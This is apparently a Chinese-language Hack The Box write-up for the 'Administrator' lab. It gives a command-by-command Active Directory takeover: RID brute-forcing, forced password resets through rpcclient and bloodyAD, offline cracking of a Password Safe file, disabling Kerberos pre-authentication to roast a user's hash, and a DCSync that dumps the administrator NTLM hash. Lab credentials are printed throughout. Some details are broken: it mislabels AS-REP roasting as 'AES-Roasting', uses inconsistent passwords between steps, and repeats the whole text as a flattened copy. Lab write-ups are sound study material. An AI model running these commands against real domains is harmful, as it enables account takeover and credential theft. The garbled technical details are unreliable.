HTB-administrator-WriteUp

字数 1355 2025-08-29 22:41:38

HTB Administrator 靶机渗透测试详细教程

1. 初始信息收集

1.1 Nmap 扫描

首先使用 Nmap 对目标进行扫描，识别开放的服务和端口：

nmap -sV -sC -p- 10.10.11.42

2. SMB 服务枚举

2.1 用户名枚举

使用 crackmapexec 进行 SMB 用户名枚举：

crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --rid-brute | grep SidTypeUser

2.2 AES-Roasting 攻击

尝试对 Kerberos 进行 AES-Roasting 攻击，获取用户票据。

3. 域内信息收集

3.1 BloodHound 分析

使用 BloodHound 收集和分析域内关系：

bloodhound-python -d administrator.htb -u Olivia -p ichliebedich -ns 10.10.11.42 -c All

分析发现：

Olivia 用户对 Michael 拥有完全控制权限
Michael 用户对 Benjamin 拥有权限

4. 权限提升路径

4.1 利用 Olivia 控制 Michael

crackmapexec smb 10.10.11.42 -u Olivia -p ichliebedich

修改 Michael 的密码：

rpcclient -U Olivia //10.10.11.42
> setuserinfo2 Michael 23 'newpassword123'

4.2 利用 Michael 控制 Benjamin

crackmapexec smb 10.10.11.42 -u Michael -p newpassword123

尝试修改 Benjamin 密码（WinRM 方式失败）：

rpcclient -U Michael //10.10.11.42
> setuserinfo2 Benjamin 23 '12345678'

或者使用 bloodyAD：

bloodyAD -u "Michael" -p "12345678" -d "administrator.htb" --host "10.10.11.42" set password "Benjamin" "12345678"

5. 获取 Benjamin 的 FTP 访问权限

5.1 枚举 Benjamin 的权限

crackmapexec smb 10.10.11.42 -u Benjamin -p 12345678

5.2 访问 FTP 并下载文件

ftp 10.10.11.42
# 使用 Benjamin:12345678 登录
> get Backup.psafe3

5.3 破解 Password Safe 文件

提取 hash：

pwsafe2john Backup.psafe3 > hash.txt

使用 John the Ripper 破解：

john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt

得到密码：tekieromucho

6. 进一步权限提升

6.1 使用新凭证枚举

现在拥有以下凭证：

Olivia:ichliebedich
Michael:newpassword123
Benjamin:12345678
从 psafe 文件中获取的其他凭证

6.2 BloodHound 分析新路径

发现 Emily 用户对 Ethan 有 Generic Write 权限。

6.3 利用 Emily 账户

尝试 WinRM 登录：

crackmapexec winrm 10.10.11.42 -u user.txt -p pass.txt --continue-on-success

发现 user.txt 文件

6.4 修改 Ethan 的 Kerberos 设置

通过 Emily 账户，设置 Ethan 用户不需要 Kerberos 预认证：

Get-ADUser ethan | Set-ADAccountControl -doesnotrequirepreauth $true

6.5 对 Ethan 进行 AES-Roasting 攻击

获取 Ethan 的 TGT：

impacket-GetNPUsers administrator.htb/ethan -dc-ip 10.10.11.42 -no-pass

使用 hashcat 破解：

hashcat -m 18200 ethan.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --force

得到密码：limpbizkit

7. 最终域控提权

7.1 使用 DCSync 攻击

利用 Ethan 的凭证进行 DCSync 攻击获取域控 hash：

impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42 -dc-ip 10.10.11.42 -just-dc-user administrator

7.2 获取 Administrator 的 NTLM hash

得到 Administrator 的 NTLM hash：

7b1247f21518cf5e74225f468c60e90d

8. 总结

整个攻击路径如下：

通过 SMB 枚举发现 Olivia 账户
利用 Olivia 控制 Michael
通过 Michael 控制 Benjamin
从 Benjamin 的 FTP 获取密码文件并破解
发现 Emily 控制 Ethan 的路径
修改 Ethan 的 Kerberos 设置并进行 AES-Roasting
最终通过 DCSync 获取域管权限

关键点：

正确使用 BloodHound 分析域内关系
合理利用每个账户的权限进行横向移动
组合使用多种攻击方法（AES-Roasting, DCSync 等）

HTB Administrator 靶机渗透测试详细教程 1. 初始信息收集 1.1 Nmap 扫描首先使用 Nmap 对目标进行扫描，识别开放的服务和端口： 2. SMB 服务枚举 2.1 用户名枚举使用 crackmapexec 进行 SMB 用户名枚举： 2.2 AES-Roasting 攻击尝试对 Kerberos 进行 AES-Roasting 攻击，获取用户票据。 3. 域内信息收集 3.1 BloodHound 分析使用 BloodHound 收集和分析域内关系：分析发现： Olivia 用户对 Michael 拥有完全控制权限 Michael 用户对 Benjamin 拥有权限 4. 权限提升路径 4.1 利用 Olivia 控制 Michael 登录 Olivia 账户：修改 Michael 的密码： 4.2 利用 Michael 控制 Benjamin 登录 Michael 账户：尝试修改 Benjamin 密码（WinRM 方式失败）：或者使用 bloodyAD： 5. 获取 Benjamin 的 FTP 访问权限 5.1 枚举 Benjamin 的权限 5.2 访问 FTP 并下载文件 5.3 破解 Password Safe 文件提取 hash：使用 John the Ripper 破解：得到密码： tekieromucho 6. 进一步权限提升 6.1 使用新凭证枚举现在拥有以下凭证： Olivia:ichliebedich Michael:newpassword123 Benjamin:12345678 从 psafe 文件中获取的其他凭证 6.2 BloodHound 分析新路径发现 Emily 用户对 Ethan 有 Generic Write 权限。 6.3 利用 Emily 账户尝试 WinRM 登录：发现 user.txt 文件 6.4 修改 Ethan 的 Kerberos 设置通过 Emily 账户，设置 Ethan 用户不需要 Kerberos 预认证： 6.5 对 Ethan 进行 AES-Roasting 攻击获取 Ethan 的 TGT：使用 hashcat 破解：得到密码： limpbizkit 7. 最终域控提权 7.1 使用 DCSync 攻击利用 Ethan 的凭证进行 DCSync 攻击获取域控 hash： 7.2 获取 Administrator 的 NTLM hash 得到 Administrator 的 NTLM hash： 8. 总结整个攻击路径如下：通过 SMB 枚举发现 Olivia 账户利用 Olivia 控制 Michael 通过 Michael 控制 Benjamin 从 Benjamin 的 FTP 获取密码文件并破解发现 Emily 控制 Ethan 的路径修改 Ethan 的 Kerberos 设置并进行 AES-Roasting 最终通过 DCSync 获取域管权限关键点：正确使用 BloodHound 分析域内关系合理利用每个账户的权限进行横向移动组合使用多种攻击方法（AES-Roasting, DCSync 等）